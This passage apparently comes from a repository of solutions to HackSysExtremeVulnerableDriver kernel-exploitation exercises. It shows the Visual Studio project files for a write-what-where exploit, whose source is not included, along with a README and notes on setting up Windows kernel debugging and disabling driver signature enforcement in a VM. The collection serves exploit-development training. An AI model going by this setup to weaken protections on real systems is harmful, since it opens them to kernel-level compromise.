104 |       <SubSystem>Console</SubSystem>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |     </ClCompile>
116 |     <Link>
117 |       <SubSystem>Console</SubSystem>
118 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
119 |       <OptimizeReferences>true</OptimizeReferences>
120 |     </Link>
121 |   </ItemDefinitionGroup>
122 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
123 |     <ClCompile>
124 |       <WarningLevel>Level3</WarningLevel>
125 |       <PrecompiledHeader>Use</PrecompiledHeader>
126 |       <Optimization>MaxSpeed</Optimization>
127 |       <FunctionLevelLinking>true</FunctionLevelLinking>
128 |       <IntrinsicFunctions>true</IntrinsicFunctions>
129 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130 |     </ClCompile>
131 |     <Link>
132 |       <SubSystem>Console</SubSystem>
133 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
134 |       <OptimizeReferences>true</OptimizeReferences>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemGroup>
138 |     <Text Include="ReadMe.txt" />
139 |   </ItemGroup>
140 |   <ItemGroup>
141 |     <ClInclude Include="stdafx.h" />
142 |     <ClInclude Include="targetver.h" />
143 |   </ItemGroup>
144 |   <ItemGroup>
145 |     <ClCompile Include="stdafx.cpp">
146 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
147 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
148 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
150 |     </ClCompile>
151 |     <ClCompile Include="WriteWhatWhere-Exploit.cpp" />
152 |   </ItemGroup>
153 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
154 |   <ImportGroup Label="ExtensionTargets">
155 |   </ImportGroup>
156 | </Project>


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/WriteWhatWhere-Exploit.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="WriteWhatWhere-Exploit.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // WriteWhatWhere-Exploit.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/HEVD-WriteWhatWhere-Exploit/WriteWhatWhere-Exploit/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 tekwizz123
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # HEVD-Exploit-Solutions
2 | Solutions to HackSysExtremeVulnerableDriver challenges though my following of @FuzzySecurity's tutorials plus futher explanations where needed.
3 | 


--------------------------------------------------------------------------------
/Viewing Debug Messages.txt:
--------------------------------------------------------------------------------
 1 | So apparently if your debugging a target in kernel debugging mode and the guest is Windows Vista+, DbgPrint is mapped
 2 | to DbgPrintEx, which allows one to "control the conditions under which messages will be sent to the kernel debugger 
 3 | by filtering messages via a component name and level in the function call and an associated filter mask in either
 4 | the registry or in memory." (http://www.osronline.com/article.cfm?article=295) 
 5 | 
 6 | According to http://www.osronline.com/article.cfm?article=295, one can fix this via two methods. The method
 7 | I tried was to create the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter
 8 | and create a REG_DWORD underneath this called DEFAULT which I set to a value of 0xF to view all debug output.
 9 | 
10 | This appears to work and needs to be done on the guest. If the above instructions are confusing one can find a further 
11 | explanation at http://www.osronline.com/article.cfm?article=295, however note they use the shorthand version of the 
12 | registry values (ex HKEY_LOCAL_MACHINE is HKLM and CurrentControlSet is CCS)
13 | 


--------------------------------------------------------------------------------
/Windows 10 Kernel Debugging Setup.txt:
--------------------------------------------------------------------------------
 1 | 1. Power on Windows 10 VM. Copy VirtualKD-3.0 folder to the VM's desktop.
 2 | 2. Open VirtualKD-3.0 and then browse to target
 3 | 3. Run vminstall.exe program located in this directory. Accept the defaults, click past the first warning, and click No 
 4 |    on the reboot message that appears after this.
 5 | 4. Browse to VirtualKD-3.0/target/x86/ or VirtualKD-3.0/target/x64/ (depending on target architecture of Windows 10 host) 
 6 |    and copy kdbazis.dll and kdpatch.sys to C:\Windows\System32\Drivers\. You will need to click Yes on the UAC warning as 
 7 |    you need admin privs to copy to this folder.
 8 | 5. Go back to VirtualKD-3.0/target/ and run kdpatch as admin by double clicking on it and clicking Yes on the UAC prompt
 9 |    and then Yes on the warning that this will change settings.
10 | 6. Open CMD.exe as admin.
11 | 7. Enter the following commands:
12 |       1. bcdedit /debug on
13 |       2. bcdedit /dbgsettings serial debugport:1 baudrate:115200
14 | 8. Reboot your computer.
15 | 9. Open vmmon64.exe or vmmon.exe on your host.
16 | 10. Use the arrow keys to move between boot menu selections and get it so it is pointed to 
17 |     "Disable Signature Enforcement Manually!" or the entry similar to this one.
18 | 11. DON'T CLICK ENTER. Instead click F8 whilst hovered over this entry and then scroll down to the option 
19 |     labeled "Disable Driver Signature Enforcement" and hit ENTER.
20 | 12. Windows should now boot and send a message to VirtualKD which should now load up WinDbg with the correct
21 |     settings and drop you into a nice shell.
22 | 
23 | This has been tested to work on all Windows 10 versions I have encountered so far, including insider releases.
24 | 


--------------------------------------------------------------------------------